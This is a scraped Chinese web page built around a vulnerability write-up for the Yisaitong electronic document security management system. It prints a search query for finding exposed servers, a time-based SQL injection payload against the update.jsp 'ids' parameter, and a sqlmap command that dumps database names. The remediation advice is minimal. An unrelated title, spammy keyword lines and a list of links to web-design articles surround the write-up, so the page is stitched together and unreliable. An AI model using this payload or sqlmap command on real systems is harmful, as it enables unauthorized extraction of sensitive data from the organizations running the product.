当前位置: 首页 > news >正文

电商网站建设模板网站错位

电商网站建设模板,网站错位,做网站主要学什么,做外贸哪些国外网站可以推广目录 0x01 漏洞介绍 0x02 影响产品 0x03 语法特征 0x04 漏洞复现页面 0x05 漏洞修复建议 0x01 漏洞介绍 亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台&#…

目录

0x01 漏洞介绍

0x02 影响产品

0x03 语法特征

0x04 漏洞复现页面

0x05 漏洞修复建议


0x01 漏洞介绍

亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。
 

0x02 影响产品

  1. 亿赛通电子文档安全管理系统

0x03 语法特征

  1. app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现
页面
 

图片


POC

 
  1. CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:值%27--

修改值的大小 对应延迟时间
 

图片

图片

 
  1. python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractiv

  2. ate/update.jsp?flag=1&ids=1,3)" --batch --dbs

图片

0x05 漏洞修复建议

设置防火墙规则,过滤漏洞相关的敏感链接监测

图片

                                                   没看够~?欢迎关注扫一扫~

http://www.yayakq.cn/news/510347/

相关文章:

  • 网站需要怎么做的wordpress apache
  • 网站建设与实践佛山智能网站建设地址设计
  • 春播网站是谁做的wordpress文章形式图标
  • 收钱码合并的网站怎么做济南做网站比较好的公司有哪些
  • 高唐网站制作网络科技网站排名
  • 定制网站开发都提供那些东西灵璧有做公司网站的吗
  • 百度指数不高的网站怎么优化杭州做网站的公司排行
  • 免费搭建业务网站微信小程序开发平台官网登录
  • 网站页面排名优化网站设计规划报告
  • 网站支付宝接口代码荆州市住房和城乡建设厅官方网站
  • 如何选择番禺网站建设安陆网站设计
  • 网站500拱墅区哪里有网站建设
  • 中山站群网站建设购物网站开发需求分析
  • 厦门外贸建站学做网站零基础
  • 做网站的关键词怎么判断好不好邯郸个人做网站
  • 做网站需要多少钱一年视频网站建设公司
  • 建设网站的申请整站seo排名外包
  • 佛山做外贸网站代理商网站模板如何使用
  • 外网网站建设网站怎么做筛选
  • 给网站怎么做tag标签怎样做网络销售平台
  • 门户和网站的区别企业网站建设公司选择分析
  • 江苏亿之盛建设有限公司网站上海礼品定制网站
  • 360免费建站域名免费吗建网站签合同
  • 网站建设备案需要什么我市建设车辆违章查询网站 病句
  • 关于对网站建设工作情况的通报工业品网络营销
  • ps做网站页面先后顺序兰州市建设工程安全质量监督站网站
  • 网站图片自动下载大前端Wordpress图片主题
  • 个人虚拟机做网站建设网站建设哪里好
  • 网站的备案可以管几年定制网络监控方案
  • 清新区城乡建设局网站我想接加工单